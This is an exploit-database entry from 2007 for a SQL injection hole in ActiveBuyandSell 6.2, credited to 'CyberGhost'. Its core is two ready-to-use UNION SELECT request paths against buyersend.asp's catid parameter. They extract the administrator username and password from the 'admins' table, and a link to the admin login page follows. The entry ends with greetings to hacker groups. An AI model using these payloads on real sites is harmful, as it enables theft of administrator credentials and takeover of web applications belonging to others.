ActiveBuyandSell 6.2 (buyersend.asp catid) SQL Injection Vulnerability

2007-03-23T00:00:00
ID 1337DAY-ID-1638
Type zdt
Reporter CyberGhost
Modified 2007-03-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
ActiveBuyandSell 6.2 (buyersend.asp catid) SQL Injection Vulnerability
======================================================================



#Title  : Active BuyandSell Remote SQL Injection Vulnerability
#Author : CyberGhost

#Vuln.

#Username : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,adminname,8,9,0,1,2,3,4,5,6+from+admins
#Password : /buyersend.asp?catid=-1+union+select+0,1,2,3,4,5,6,password,8,9,0,1,2,3,4,5,6+from+admins

#Admin Login : /admin.asp
====================================

Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !



#  0day.today [2018-01-02]  #